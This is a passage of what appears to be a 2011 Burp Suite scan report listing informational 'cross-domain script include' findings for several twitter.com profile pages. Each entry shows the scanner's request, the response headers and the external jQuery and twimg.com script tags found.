Cookie: original_referer=OTZIBTkFw3vZjuP4Il%2FETHEMNaG1XwXa; __utmv=43838368.lang%3A%20en; guest_id=129452629042599503; __utmz=43838368.1296232506.2.2.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/24; tz_offset_sec=-21600; __utma=43838368.1078689092.1296223511.1296223511.1296232506.2; auth_token=; __utmc=43838368; _twitter_sess=BAh7CzoVaW5fbmV3X3VzZXJfZmxvdzA6DGNzcmZfaWQiJWFiYzQ1NWM5YjQ1%250ANWJjMzdkMGZkMjlmMjZhNWUzMTFjOgx0el9uYW1lIhRDZW50cmFsIEFtZXJp%250AY2EiCmZsYXNoSUM6J0FjdGlvbkNvbnRyb2xsZXI6OkZsYXNoOjpGbGFzaEhh%250Ac2h7AAY6CkB1c2VkewA6B2lkIiUxYzk1MzQ4MWE0MmZkZTljMGM3NGFlZDU3%250AOTFmMmY2NDoPY3JlYXRlZF9hdGwrCDNO8MwtAQ%253D%253D--7dcad2860e47342f7b7e17312d3dafb1ebda0ee1; __utmb=43838368.3.10.1296232506; k=173.193.214.243.1296227675375304;

Response

HTTP/1.0 200 OK
Date: Sat, 29 Jan 2011 01:41:22 GMT
Server: hi
Status: 200 OK
X-Transaction: 1296265282-57668-31881
ETag: "a2ed93258e38abb440f9997e5bc5343f"
Last-Modified: Sat, 29 Jan 2011 01:41:22 GMT
X-Runtime: 0.00798
Content-Type: text/html; charset=utf-8
Content-Length: 49756
Pragma: no-cache
X-Revision: DEV
Expires: Tue, 31 Mar 1981 05:00:00 GMT
Cache-Control: no-cache, no-store, must-revalidate, pre-check=0, post-check=0
Set-Cookie: auth_token=; path=/; expires=Thu, 01 Jan 1970 00:00:00 GMT
Set-Cookie: _twitter_sess=BAh7CzoMdHpfbmFtZSIUQ2VudHJhbCBBbWVyaWNhOgxjc3JmX2lkIiVhYmM0%250ANTVjOWI0NTViYzM3ZDBmZDI5ZjI2YTVlMzExYzoVaW5fbmV3X3VzZXJfZmxv%250AdzA6D2NyZWF0ZWRfYXRsKwgzTvDMLQE6B2lkIiUxYzk1MzQ4MWE0MmZkZTlj%250AMGM3NGFlZDU3OTFmMmY2NCIKZmxhc2hJQzonQWN0aW9uQ29udHJvbGxlcjo6%250ARmxhc2g6OkZsYXNoSGFzaHsABjoKQHVzZWR7AA%253D%253D--a144f2d48721ec13cc6db17b0167bf7e0dce4447; domain=.twitter.com; path=/
X-XSS-Protection: 1; mode=block
X-Frame-Options: SAMEORIGIN
Vary: Accept-Encoding
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
<meta htt
...[SNIP]...
</div>


<script src="http://ajax.googleapis.com/ajax/libs/jquery/1.3.0/jquery.min.js" type="text/javascript"></script>
<script src="http://a1.twimg.com/a/1296245718/javascripts/twitter.js?1296248415" type="text/javascript"></script>
<script src="http://a3.twimg.com/a/1296245718/javascripts/lib/jquery.tipsy.min.js?1296248415" type="text/javascript"></script>
<script type='text/javascript' src='http://www.google.com/jsapi'></script>
<script src="http://a3.twimg.com/a/1296245718/javascripts/lib/gears_init.js?1296248415" type="text/javascript"></script>
<script src="http://a0.twimg.com/a/1296245718/javascripts/lib/mustache.js?1296248415" type="text/javascript"></script>
<script src="http://a1.twimg.com/a/1296245718/javascripts/geov1.js?1296248415" type="text/javascript"></script>
<script src="http://a3.twimg.com/a/1296245718/javascripts/api.js?1296248415" type="text/javascript"></script>
...[SNIP]...
</script>
<script src="http://a0.twimg.com/a/1296245718/javascripts/lib/mustache.js?1296248415" type="text/javascript"></script>
<script src="http://a1.twimg.com/a/1296245718/javascripts/dismissable.js?1296248415" type="text/javascript"></script>
...[SNIP]...

18.320. http://twitter.com/Applebees

Summary

Severity:   Information
Confidence:   Certain
Host:   http://twitter.com
Path:   /Applebees

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /Applebees HTTP/1.1
Host: twitter.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: original_referer=OTZIBTkFw3vZjuP4Il%2FETHEMNaG1XwXa; __utmv=43838368.lang%3A%20en; guest_id=129452629042599503; __utmz=43838368.1296232506.2.2.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/24; tz_offset_sec=-21600; __utma=43838368.1078689092.1296223511.1296223511.1296232506.2; auth_token=; __utmc=43838368; _twitter_sess=BAh7CzoVaW5fbmV3X3VzZXJfZmxvdzA6DGNzcmZfaWQiJWFiYzQ1NWM5YjQ1%250ANWJjMzdkMGZkMjlmMjZhNWUzMTFjOgx0el9uYW1lIhRDZW50cmFsIEFtZXJp%250AY2EiCmZsYXNoSUM6J0FjdGlvbkNvbnRyb2xsZXI6OkZsYXNoOjpGbGFzaEhh%250Ac2h7AAY6CkB1c2VkewA6B2lkIiUxYzk1MzQ4MWE0MmZkZTljMGM3NGFlZDU3%250AOTFmMmY2NDoPY3JlYXRlZF9hdGwrCDNO8MwtAQ%253D%253D--7dcad2860e47342f7b7e17312d3dafb1ebda0ee1; __utmb=43838368.3.10.1296232506; k=173.193.214.243.1296227675375304;

Response

HTTP/1.0 200 OK
Date: Sat, 29 Jan 2011 01:52:53 GMT
Server: hi
Status: 200 OK
X-Transaction: 1296265973-32426-51080
ETag: "6de1ef610ac1e89e0f9514036de3e619"
Last-Modified: Sat, 29 Jan 2011 01:52:53 GMT
X-Runtime: 0.01745
Content-Type: text/html; charset=utf-8
Content-Length: 51962
Pragma: no-cache
X-Revision: DEV
Expires: Tue, 31 Mar 1981 05:00:00 GMT
Cache-Control: no-cache, no-store, must-revalidate, pre-check=0, post-check=0
Set-Cookie: auth_token=; path=/; expires=Thu, 01 Jan 1970 00:00:00 GMT
Set-Cookie: _twitter_sess=BAh7CzoMdHpfbmFtZSIUQ2VudHJhbCBBbWVyaWNhOgxjc3JmX2lkIiVhYmM0%250ANTVjOWI0NTViYzM3ZDBmZDI5ZjI2YTVlMzExYzoVaW5fbmV3X3VzZXJfZmxv%250AdzA6B2lkIiUxYzk1MzQ4MWE0MmZkZTljMGM3NGFlZDU3OTFmMmY2NCIKZmxh%250Ac2hJQzonQWN0aW9uQ29udHJvbGxlcjo6Rmxhc2g6OkZsYXNoSGFzaHsABjoK%250AQHVzZWR7ADoPY3JlYXRlZF9hdGwrCDNO8MwtAQ%253D%253D--a6d7378e10bd529dc003a5da544066e5f6c32f72; domain=.twitter.com; path=/
X-XSS-Protection: 1; mode=block
X-Frame-Options: SAMEORIGIN
Vary: Accept-Encoding
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
<meta htt
...[SNIP]...
</div>


<script src="http://ajax.googleapis.com/ajax/libs/jquery/1.3.0/jquery.min.js" type="text/javascript"></script>
<script src="http://a3.twimg.com/a/1296245718/javascripts/twitter.js?1296247836" type="text/javascript"></script>
<script src="http://a2.twimg.com/a/1296245718/javascripts/lib/jquery.tipsy.min.js?1296247836" type="text/javascript"></script>
<script type='text/javascript' src='http://www.google.com/jsapi'></script>
<script src="http://a1.twimg.com/a/1296245718/javascripts/lib/gears_init.js?1296247836" type="text/javascript"></script>
<script src="http://a2.twimg.com/a/1296245718/javascripts/lib/mustache.js?1296247836" type="text/javascript"></script>
<script src="http://a0.twimg.com/a/1296245718/javascripts/geov1.js?1296247836" type="text/javascript"></script>
<script src="http://a1.twimg.com/a/1296245718/javascripts/api.js?1296247836" type="text/javascript"></script>
<script src="http://a2.twimg.com/a/1296245718/javascripts/lib/mustache.js?1296247836" type="text/javascript"></script>
<script src="http://a3.twimg.com/a/1296245718/javascripts/dismissable.js?1296247836" type="text/javascript"></script>
...[SNIP]...

18.321. http://twitter.com/AshieApple

Summary

Severity:   Information
Confidence:   Certain
Host:   http://twitter.com
Path:   /AshieApple

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /AshieApple HTTP/1.1
Host: twitter.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: original_referer=OTZIBTkFw3vZjuP4Il%2FETHEMNaG1XwXa; __utmv=43838368.lang%3A%20en; guest_id=129452629042599503; __utmz=43838368.1296232506.2.2.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/24; tz_offset_sec=-21600; __utma=43838368.1078689092.1296223511.1296223511.1296232506.2; auth_token=; __utmc=43838368; _twitter_sess=BAh7CzoVaW5fbmV3X3VzZXJfZmxvdzA6DGNzcmZfaWQiJWFiYzQ1NWM5YjQ1%250ANWJjMzdkMGZkMjlmMjZhNWUzMTFjOgx0el9uYW1lIhRDZW50cmFsIEFtZXJp%250AY2EiCmZsYXNoSUM6J0FjdGlvbkNvbnRyb2xsZXI6OkZsYXNoOjpGbGFzaEhh%250Ac2h7AAY6CkB1c2VkewA6B2lkIiUxYzk1MzQ4MWE0MmZkZTljMGM3NGFlZDU3%250AOTFmMmY2NDoPY3JlYXRlZF9hdGwrCDNO8MwtAQ%253D%253D--7dcad2860e47342f7b7e17312d3dafb1ebda0ee1; __utmb=43838368.3.10.1296232506; k=173.193.214.243.1296227675375304;

Response

HTTP/1.0 200 OK
Date: Sat, 29 Jan 2011 01:52:52 GMT
Server: hi
Status: 200 OK
X-Transaction: 1296265972-35369-4983
ETag: "d630e94c0555a4dba001b1cdb5e86f78"
Last-Modified: Sat, 29 Jan 2011 01:52:52 GMT
X-Runtime: 0.01071
Content-Type: text/html; charset=utf-8
Content-Length: 29081
Pragma: no-cache
X-Revision: DEV
Expires: Tue, 31 Mar 1981 05:00:00 GMT
Cache-Control: no-cache, no-store, must-revalidate, pre-check=0, post-check=0
Set-Cookie: auth_token=; path=/; expires=Thu, 01 Jan 1970 00:00:00 GMT
Set-Cookie: _twitter_sess=BAh7CzoMdHpfbmFtZSIUQ2VudHJhbCBBbWVyaWNhOgxjc3JmX2lkIiVhYmM0%250ANTVjOWI0NTViYzM3ZDBmZDI5ZjI2YTVlMzExYzoVaW5fbmV3X3VzZXJfZmxv%250AdzA6B2lkIiUxYzk1MzQ4MWE0MmZkZTljMGM3NGFlZDU3OTFmMmY2NCIKZmxh%250Ac2hJQzonQWN0aW9uQ29udHJvbGxlcjo6Rmxhc2g6OkZsYXNoSGFzaHsABjoK%250AQHVzZWR7ADoPY3JlYXRlZF9hdGwrCDNO8MwtAQ%253D%253D--a6d7378e10bd529dc003a5da544066e5f6c32f72; domain=.twitter.com; path=/
X-XSS-Protection: 1; mode=block
X-Frame-Options: SAMEORIGIN
Vary: Accept-Encoding
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
<meta htt
...[SNIP]...
</div>


<script src="http://ajax.googleapis.com/ajax/libs/jquery/1.3.0/jquery.min.js" type="text/javascript"></script>
<script src="http://a3.twimg.com/a/1296258363/javascripts/twitter.js?1296262534" type="text/javascript"></script>
<script src="http://a2.twimg.com/a/1296258363/javascripts/lib/jquery.tipsy.min.js?1296262534" type="text/javascript"></script>
<script type='text/javascript' src='http://www.google.com/jsapi'></script>
<script src="http://a1.twimg.com/a/1296258363/javascripts/lib/gears_init.js?1296262534" type="text/javascript"></script>
<script src="http://a2.twimg.com/a/1296258363/javascripts/lib/mustache.js?1296262534" type="text/javascript"></script>
<script src="http://a0.twimg.com/a/1296258363/javascripts/geov1.js?1296262534" type="text/javascript"></script>
<script src="http://a1.twimg.com/a/1296258363/javascripts/api.js?1296262534" type="text/javascript"></script>
<script src="http://a2.twimg.com/a/1296258363/javascripts/lib/mustache.js?1296262534" type="text/javascript"></script>
<script src="http://a3.twimg.com/a/1296258363/javascripts/dismissable.js?1296262534" type="text/javascript"></script>
...[SNIP]...

18.322. http://twitter.com/Beckett_News

Summary

Severity:   Information
Confidence:   Certain
Host:   http://twitter.com
Path:   /Beckett_News

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /Beckett_News HTTP/1.1
Host: twitter.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: original_referer=OTZIBTkFw3vZjuP4Il%2FETHEMNaG1XwXa; __utmv=43838368.lang%3A%20en; guest_id=129452629042599503; __utmz=43838368.1296232506.2.2.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/24; tz_offset_sec=-21600; __utma=43838368.1078689092.1296223511.1296223511.1296232506.2; auth_token=; __utmc=43838368; _twitter_sess=BAh7CzoVaW5fbmV3X3VzZXJfZmxvdzA6DGNzcmZfaWQiJWFiYzQ1NWM5YjQ1%250ANWJjMzdkMGZkMjlmMjZhNWUzMTFjOgx0el9uYW1lIhRDZW50cmFsIEFtZXJp%250AY2EiCmZsYXNoSUM6J0FjdGlvbkNvbnRyb2xsZXI6OkZsYXNoOjpGbGFzaEhh%250Ac2h7AAY6CkB1c2VkewA6B2lkIiUxYzk1MzQ4MWE0MmZkZTljMGM3NGFlZDU3%250AOTFmMmY2NDoPY3JlYXRlZF9hdGwrCDNO8MwtAQ%253D%253D--7dcad2860e47342f7b7e17312d3dafb1ebda0ee1; __utmb=43838368.3.10.1296232506; k=173.193.214.243.1296227675375304;

Response

HTTP/1.0 200 OK
Date: Sat, 29 Jan 2011 01:52:57 GMT
Server: hi
Status: 200 OK
X-Transaction: 1296265977-87220-8975
ETag: "04df87e3f545648158c89bbf858582e1"
Last-Modified: Sat, 29 Jan 2011 01:52:57 GMT
X-Runtime: 0.01098
Content-Type: text/html; charset=utf-8
Content-Length: 40483
Pragma: no-cache
X-Revision: DEV
Expires: Tue, 31 Mar 1981 05:00:00 GMT
Cache-Control: no-cache, no-store, must-revalidate, pre-check=0, post-check=0
Set-Cookie: auth_token=; path=/; expires=Thu, 01 Jan 1970 00:00:00 GMT
Set-Cookie: _twitter_sess=BAh7CzoMdHpfbmFtZSIUQ2VudHJhbCBBbWVyaWNhOgxjc3JmX2lkIiVhYmM0%250ANTVjOWI0NTViYzM3ZDBmZDI5ZjI2YTVlMzExYzoVaW5fbmV3X3VzZXJfZmxv%250AdzA6B2lkIiUxYzk1MzQ4MWE0MmZkZTljMGM3NGFlZDU3OTFmMmY2NCIKZmxh%250Ac2hJQzonQWN0aW9uQ29udHJvbGxlcjo6Rmxhc2g6OkZsYXNoSGFzaHsABjoK%250AQHVzZWR7ADoPY3JlYXRlZF9hdGwrCDNO8MwtAQ%253D%253D--a6d7378e10bd529dc003a5da544066e5f6c32f72; domain=.twitter.com; path=/
X-XSS-Protection: 1; mode=block
X-Frame-Options: SAMEORIGIN
Vary: Accept-Encoding
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
<meta htt
...[SNIP]...
</div>


<script src="http://ajax.googleapis.com/ajax/libs/jquery/1.3.0/jquery.min.js" type="text/javascript"></script>
<script src="http://a0.twimg.com/a/1296258363/javascripts/twitter.js?1296263125" type="text/javascript"></script>
<script src="http://a3.twimg.com/a/1296258363/javascripts/lib/jquery.tipsy.min.js?1296263125" type="text/javascript"></script>
<script type='text/javascript' src='http://www.google.com/jsapi'></script>
<script src="http://a2.twimg.com/a/1296258363/javascripts/lib/gears_init.js?1296263125" type="text/javascript"></script>
<script src="http://a3.twimg.com/a/1296258363/javascripts/lib/mustache.js?1296263125" type="text/javascript"></script>
<script src="http://a0.twimg.com/a/1296258363/javascripts/geov1.js?1296263125" type="text/javascript"></script>
<script src="http://a2.twimg.com/a/1296258363/javascripts/api.js?1296263125" type="text/javascript"></script>
<script src="http://a3.twimg.com/a/1296258363/javascripts/lib/mustache.js?1296263125" type="text/javascript"></script>
<script src="http://a0.twimg.com/a/1296258363/javascripts/dismissable.js?1296263125" type="text/javascript"></script>
...[SNIP]...

18.323. http://twitter.com/BosHerald_Edge/

Summary

Severity:   Information
Confidence:   Certain
Host:   http://twitter.com
Path:   /BosHerald_Edge/

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /BosHerald_Edge/ HTTP/1.1
Host: twitter.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: original_referer=OTZIBTkFw3vZjuP4Il%2FETHEMNaG1XwXa; __utmv=43838368.lang%3A%20en; guest_id=129452629042599503; __utmz=43838368.1296232506.2.2.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/24; tz_offset_sec=-21600; __utma=43838368.1078689092.1296223511.1296223511.1296232506.2; auth_token=; __utmc=43838368; _twitter_sess=BAh7CzoVaW5fbmV3X3VzZXJfZmxvdzA6DGNzcmZfaWQiJWFiYzQ1NWM5YjQ1%250ANWJjMzdkMGZkMjlmMjZhNWUzMTFjOgx0el9uYW1lIhRDZW50cmFsIEFtZXJp%250AY2EiCmZsYXNoSUM6J0FjdGlvbkNvbnRyb2xsZXI6OkZsYXNoOjpGbGFzaEhh%250Ac2h7AAY6CkB1c2VkewA6B2lkIiUxYzk1MzQ4MWE0MmZkZTljMGM3NGFlZDU3%250AOTFmMmY2NDoPY3JlYXRlZF9hdGwrCDNO8MwtAQ%253D%253D--7dcad2860e47342f7b7e17312d3dafb1ebda0ee1; __utmb=43838368.3.10.1296232506; k=173.193.214.243.1296227675375304;

Response

HTTP/1.0 200 OK
Date: Sat, 29 Jan 2011 01:41:21 GMT
Server: hi
Status: 200 OK
X-Transaction: 1296265281-63986-28033
ETag: "94982feeb68a0a8cb68c04820be2cd8d"
Last-Modified: Sat, 29 Jan 2011 01:41:21 GMT
X-Runtime: 0.00768
Content-Type: text/html; charset=utf-8
Content-Length: 52761
Pragma: no-cache
X-Revision: DEV
Expires: Tue, 31 Mar 1981 05:00:00 GMT
Cache-Control: no-cache, no-store, must-revalidate, pre-check=0, post-check=0
Set-Cookie: auth_token=; path=/; expires=Thu, 01 Jan 1970 00:00:00 GMT
Set-Cookie: _twitter_sess=BAh7CzoMdHpfbmFtZSIUQ2VudHJhbCBBbWVyaWNhOgxjc3JmX2lkIiVhYmM0%250ANTVjOWI0NTViYzM3ZDBmZDI5ZjI2YTVlMzExYzoVaW5fbmV3X3VzZXJfZmxv%250AdzA6B2lkIiUxYzk1MzQ4MWE0MmZkZTljMGM3NGFlZDU3OTFmMmY2NCIKZmxh%250Ac2hJQzonQWN0aW9uQ29udHJvbGxlcjo6Rmxhc2g6OkZsYXNoSGFzaHsABjoK%250AQHVzZWR7ADoPY3JlYXRlZF9hdGwrCDNO8MwtAQ%253D%253D--a6d7378e10bd529dc003a5da544066e5f6c32f72; domain=.twitter.com; path=/
X-XSS-Protection: 1; mode=block
X-Frame-Options: SAMEORIGIN
Vary: Accept-Encoding
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
<meta htt
...[SNIP]...
</div>


<script src="http://ajax.googleapis.com/ajax/libs/jquery/1.3.0/jquery.min.js" type="text/javascript"></script>
<script src="http://a3.twimg.com/a/1296258363/javascripts/twitter.js?1296261409" type="text/javascript"></script>
<script src="http://a2.twimg.com/a/1296258363/javascripts/lib/jquery.tipsy.min.js?1296261409" type="text/javascript"></script>
<script type='text/javascript' src='http://www.google.com/jsapi'></script>
<script src="http://a2.twimg.com/a/1296258363/javascripts/lib/gears_init.js?1296261409" type="text/javascript"></script>
<script src="http://a3.twimg.com/a/1296258363/javascripts/lib/mustache.js?1296261409" type="text/javascript"></script>
<script src="http://a0.twimg.com/a/1296258363/javascripts/geov1.js?1296261409" type="text/javascript"></script>
<script src="http://a1.twimg.com/a/1296258363/javascripts/api.js?1296261409" type="text/javascript"></script>
<script src="http://a3.twimg.com/a/1296258363/javascripts/lib/mustache.js?1296261409" type="text/javascript"></script>
<script src="http://a0.twimg.com/a/1296258363/javascripts/dismissable.js?1296261409" type="text/javascript"></script>
...[SNIP]...

18.324. http://twitter.com/ChrisLambton13

Summary

Severity:   Information
Confidence:   Certain
Host:   http://twitter.com
Path:   /ChrisLambton13

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /ChrisLambton13 HTTP/1.1
Host: twitter.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: original_referer=OTZIBTkFw3vZjuP4Il%2FETHEMNaG1XwXa; __utmv=43838368.lang%3A%20en; guest_id=129452629042599503; __utmz=43838368.1296232506.2.2.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/24; tz_offset_sec=-21600; __utma=43838368.1078689092.1296223511.1296223511.1296232506.2; auth_token=; __utmc=43838368; _twitter_sess=BAh7CzoVaW5fbmV3X3VzZXJfZmxvdzA6DGNzcmZfaWQiJWFiYzQ1NWM5YjQ1%250ANWJjMzdkMGZkMjlmMjZhNWUzMTFjOgx0el9uYW1lIhRDZW50cmFsIEFtZXJp%250AY2EiCmZsYXNoSUM6J0FjdGlvbkNvbnRyb2xsZXI6OkZsYXNoOjpGbGFzaEhh%250Ac2h7AAY6CkB1c2VkewA6B2lkIiUxYzk1MzQ4MWE0MmZkZTljMGM3NGFlZDU3%250AOTFmMmY2NDoPY3JlYXRlZF9hdGwrCDNO8MwtAQ%253D%253D--7dcad2860e47342f7b7e17312d3dafb1ebda0ee1; __utmb=43838368.3.10.1296232506; k=173.193.214.243.1296227675375304;

Response

HTTP/1.0 200 OK
Date: Sat, 29 Jan 2011 01:51:48 GMT
Server: hi
Status: 200 OK
X-Transaction: 1296265908-61244-34588
ETag: "2188d703ab23d0ac8a30be86c7dd57e4"
Last-Modified: Sat, 29 Jan 2011 01:51:48 GMT
X-Runtime: 0.01239
Content-Type: text/html; charset=utf-8
Content-Length: 50278
Pragma: no-cache
X-Revision: DEV
Expires: Tue, 31 Mar 1981 05:00:00 GMT
Cache-Control: no-cache, no-store, must-revalidate, pre-check=0, post-check=0
Set-Cookie: auth_token=; path=/; expires=Thu, 01 Jan 1970 00:00:00 GMT
Set-Cookie: _twitter_sess=BAh7CzoMdHpfbmFtZSIUQ2VudHJhbCBBbWVyaWNhOgxjc3JmX2lkIiVhYmM0%250ANTVjOWI0NTViYzM3ZDBmZDI5ZjI2YTVlMzExYzoVaW5fbmV3X3VzZXJfZmxv%250AdzA6B2lkIiUxYzk1MzQ4MWE0MmZkZTljMGM3NGFlZDU3OTFmMmY2NCIKZmxh%250Ac2hJQzonQWN0aW9uQ29udHJvbGxlcjo6Rmxhc2g6OkZsYXNoSGFzaHsABjoK%250AQHVzZWR7ADoPY3JlYXRlZF9hdGwrCDNO8MwtAQ%253D%253D--a6d7378e10bd529dc003a5da544066e5f6c32f72; domain=.twitter.com; path=/
X-XSS-Protection: 1; mode=block
X-Frame-Options: SAMEORIGIN
Vary: Accept-Encoding
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
<meta htt
...[SNIP]...
</div>


<script src="http://ajax.googleapis.com/ajax/libs/jquery/1.3.0/jquery.min.js" type="text/javascript"></script>
<script src="http://a0.twimg.com/a/1296245718/javascripts/twitter.js?1296247248" type="text/javascript"></script>
<script src="http://a2.twimg.com/a/1296245718/javascripts/lib/jquery.tipsy.min.js?1296247248" type="text/javascript"></script>
<script type='text/javascript' src='http://www.google.com/jsapi'></script>
<script src="http://a2.twimg.com/a/1296245718/javascripts/lib/gears_init.js?1296247248" type="text/javascript"></script>
<script src="http://a3.twimg.com/a/1296245718/javascripts/lib/mustache.js?1296247248" type="text/javascript"></script>
<script src="http://a0.twimg.com/a/1296245718/javascripts/geov1.js?1296247248" type="text/javascript"></script>
<script src="http://a2.twimg.com/a/1296245718/javascripts/api.js?1296247248" type="text/javascript"></script>
<script src="http://a3.twimg.com/a/1296245718/javascripts/lib/mustache.js?1296247248" type="text/javascript"></script>
<script src="http://a0.twimg.com/a/1296245718/javascripts/dismissable.js?1296247248" type="text/javascript"></script>
...[SNIP]...

18.325. http://twitter.com/ConanOBrien

Summary

Severity:   Information
Confidence:   Certain
Host:   http://twitter.com
Path:   /ConanOBrien

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /ConanOBrien HTTP/1.1
Host: twitter.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: original_referer=OTZIBTkFw3vZjuP4Il%2FETHEMNaG1XwXa; __utmv=43838368.lang%3A%20en; guest_id=129452629042599503; __utmz=43838368.1296232506.2.2.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/24; tz_offset_sec=-21600; __utma=43838368.1078689092.1296223511.1296223511.1296232506.2; auth_token=; __utmc=43838368; _twitter_sess=BAh7CzoVaW5fbmV3X3VzZXJfZmxvdzA6DGNzcmZfaWQiJWFiYzQ1NWM5YjQ1%250ANWJjMzdkMGZkMjlmMjZhNWUzMTFjOgx0el9uYW1lIhRDZW50cmFsIEFtZXJp%250AY2EiCmZsYXNoSUM6J0FjdGlvbkNvbnRyb2xsZXI6OkZsYXNoOjpGbGFzaEhh%250Ac2h7AAY6CkB1c2VkewA6B2lkIiUxYzk1MzQ4MWE0MmZkZTljMGM3NGFlZDU3%250AOTFmMmY2NDoPY3JlYXRlZF9hdGwrCDNO8MwtAQ%253D%253D--7dcad2860e47342f7b7e17312d3dafb1ebda0ee1; __utmb=43838368.3.10.1296232506; k=173.193.214.243.1296227675375304;

Response

HTTP/1.0 200 OK
Date: Sat, 29 Jan 2011 01:52:55 GMT
Server: hi
Status: 200 OK
X-Transaction: 1296265975-23118-1747
ETag: "86f99f7437978cad54926bacf38c847f"
Last-Modified: Sat, 29 Jan 2011 01:52:55 GMT
X-Runtime: 0.01272
Content-Type: text/html; charset=utf-8
Content-Length: 36266
Pragma: no-cache
X-Revision: DEV
Expires: Tue, 31 Mar 1981 05:00:00 GMT
Cache-Control: no-cache, no-store, must-revalidate, pre-check=0, post-check=0
Set-Cookie: auth_token=; path=/; expires=Thu, 01 Jan 1970 00:00:00 GMT
Set-Cookie: _twitter_sess=BAh7CzoMdHpfbmFtZSIUQ2VudHJhbCBBbWVyaWNhOgxjc3JmX2lkIiVhYmM0%250ANTVjOWI0NTViYzM3ZDBmZDI5ZjI2YTVlMzExYzoVaW5fbmV3X3VzZXJfZmxv%250AdzA6B2lkIiUxYzk1MzQ4MWE0MmZkZTljMGM3NGFlZDU3OTFmMmY2NCIKZmxh%250Ac2hJQzonQWN0aW9uQ29udHJvbGxlcjo6Rmxhc2g6OkZsYXNoSGFzaHsABjoK%250AQHVzZWR7ADoPY3JlYXRlZF9hdGwrCDNO8MwtAQ%253D%253D--a6d7378e10bd529dc003a5da544066e5f6c32f72; domain=.twitter.com; path=/
X-XSS-Protection: 1; mode=block
X-Frame-Options: SAMEORIGIN
Vary: Accept-Encoding
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
<meta htt
...[SNIP]...
</div>


<script src="http://ajax.googleapis.com/ajax/libs/jquery/1.3.0/jquery.min.js" type="text/javascript"></script>
<script src="http://a1.twimg.com/a/1296258363/javascripts/twitter.js?1296261955" type="text/javascript"></script>
<script src="http://a0.twimg.com/a/1296258363/javascripts/lib/jquery.tipsy.min.js?1296261955" type="text/javascript"></script>
<script type='text/javascript' src='http://www.google.com/jsapi'></script>
<script src="http://a3.twimg.com/a/1296258363/javascripts/lib/gears_init.js?1296261955" type="text/javascript"></script>
<script src="http://a0.twimg.com/a/1296258363/javascripts/lib/mustache.js?1296261955" type="text/javascript"></script>
<script src="http://a2.twimg.com/a/1296258363/javascripts/geov1.js?1296261955" type="text/javascript"></script>
<script src="http://a3.twimg.com/a/1296258363/javascripts/api.js?1296261955" type="text/javascript"></script>
...[SNIP]...
</script>
<script src="http://a0.twimg.com/a/1296258363/javascripts/lib/mustache.js?1296261955" type="text/javascript"></script>
<script src="http://a1.twimg.com/a/1296258363/javascripts/dismissable.js?1296261955" type="text/javascript"></script>
...[SNIP]...

18.326. http://twitter.com/DustinPedroia15

Summary

Severity:   Information
Confidence:   Certain
Host:   http://twitter.com
Path:   /DustinPedroia15

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /DustinPedroia15 HTTP/1.1
Host: twitter.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
